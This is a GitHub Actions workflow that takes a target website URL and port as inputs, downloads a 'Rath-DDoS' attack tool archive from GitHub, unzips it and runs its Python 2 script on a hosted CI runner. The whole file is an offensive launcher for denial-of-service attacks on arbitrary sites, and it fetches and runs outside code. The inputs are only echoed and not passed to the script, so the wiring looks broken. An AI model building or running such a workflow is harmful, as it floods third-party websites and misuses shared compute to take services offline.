
name: Rath-DDoS

on:
  workflow_dispatch:
    inputs:
      url:
        description: "Website Url"
        required: true
        default: "https://google.com"
      port:
        description: "Port of target Website"
        required: true
        default: "80"
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
    - name: Install Python2 & Unzipper
      run: |
       sudo apt update
       sudo apt install python2
       sudo apt-get install unzip -y
    - name: Cloning Rath-DDoS
      run: wget -O rath-ddos.zip https://github.com/kinghacker0/Rath-DDoS/archive/refs/heads/master.zip
    - name: Unzip Zip
      run: unzip rath-ddos.zip
    - name: Directory
      run: |
       cd rath-ddos
       cd Rath-DDoS
    - name: Running Script
      run: |
       python2 rath.py
       echo ${{ github.event.inputs.url }}
       echo ${{ github.event.inputs.port }}
